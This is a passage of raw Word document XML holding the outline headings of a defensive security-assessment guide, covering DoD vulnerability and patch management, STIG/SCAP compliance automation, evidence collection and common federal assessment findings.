    <w:p w14:paraId="0F9751DF" w14:textId="32E8F801" w:rsidR="00480F8E" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.4.8 Identity Governance and Administrative Security Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904C046" w14:textId="27B16029" w:rsidR="00480F8E" w:rsidRPr="00E24DE9" w:rsidRDefault="00480F8E" w:rsidP="00E24DE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.5 Vulnerability and Patch Management – Assessment Readiness Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97FD1E" w14:textId="737B4373" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.1 DoD Vulnerability and Patch Management Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDD0F8" w14:textId="1FEF0498" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.2 Vulnerability Discovery and Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424E971C" w14:textId="4FE86DC3" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.5.3 Security Baseline Scope and Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C7473E" w14:textId="1D5568C5" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.4 SRG and STIG Compliance Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44428F" w14:textId="126ED621" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.5 Configuration Change Board (CCB) and Management Reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE5456" w14:textId="766D01D7" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.6 Risk Prioritization and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6345DF2C" w14:textId="52AD2CB2" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.7 Continuous Monitoring (ConMon) Activities to Reduce Fatigue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30986CC8" w14:textId="196CB89C" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.8 Automated STIG Compliance Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF0AB6" w14:textId="35E7CA95" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.9 Configuration Drift Detection and Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56658A2E" w14:textId="7BC99CCF" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.10 SCAP Automation and Continuous Compliance Initiatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B9E94D" w14:textId="089680E0" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.11 STIG-to-CCI-to-eMASS Control Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EA050" w14:textId="3C28E3DD" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.12 Policy-as-Code Security Baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1C0A7" w14:textId="63A0E633" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.13 Continuous Authorization to Operate (cATO) Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31E37E" w14:textId="52FF5DDC" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.5.14 Security Automation Platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E1777" w14:textId="3465C179" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.5.14.1 SteelCloud ConfigOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C494E" w14:textId="12825D0A" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.5.14.2 Security Content Automation Protocol (SCAP) Ecosystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CADEA" w14:textId="16353CC3" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.5.14.3 Digital Twins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A750B" w14:textId="47297239" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.5.14.4 ServiceNow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347393FC" w14:textId="1F33B20D" w:rsidR="00061C1A" w:rsidRDefault="00061C1A" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>5.5.14.5 Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D89DBE" w14:textId="54069DBA" w:rsidR="00FC42B2" w:rsidRPr="00E24DE9" w:rsidRDefault="00FC42B2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.6 Assessment Evidence and Artifact Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0474D0EE" w14:textId="61409355" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Documentation Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759BE5E2" w14:textId="5AF246CC" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.2 Security Control Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43F3FA" w14:textId="4556E2BD" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.3 Technical Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C0046A" w14:textId="6B83D4C5" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.4 Administrative Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375AE9A9" w14:textId="4F110D25" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.5 Operational Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A8502D" w14:textId="0CB75FB1" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.6 Physical Security Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89D210" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.7 Artifact Validation Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF14DC8" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.6.8 Supporting Federal Assessment Teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58442D42" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRPr="00E24DE9" w:rsidRDefault="00FC42B2" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.7 Common Federal and Military Security Assessment Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FB737A" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.1 Authentication and Credential Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA493A6" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.7.2 Active Directory Security Findings and Misconfigurations Identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE77B97" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.3 Privileged Access Findings and Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E026A79" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.4 PKI and Certificate Management Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59CB3D" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.5 Logging and Auditing Security Control Deficiencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961440A" w14:textId="77777777" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5.7.6 Vulnerability and Patch Management Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9064C0" w14:textId="46FAA7BF" w:rsidR="00FC42B2" w:rsidRDefault="00FC42B2" w:rsidP="00E24DE9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
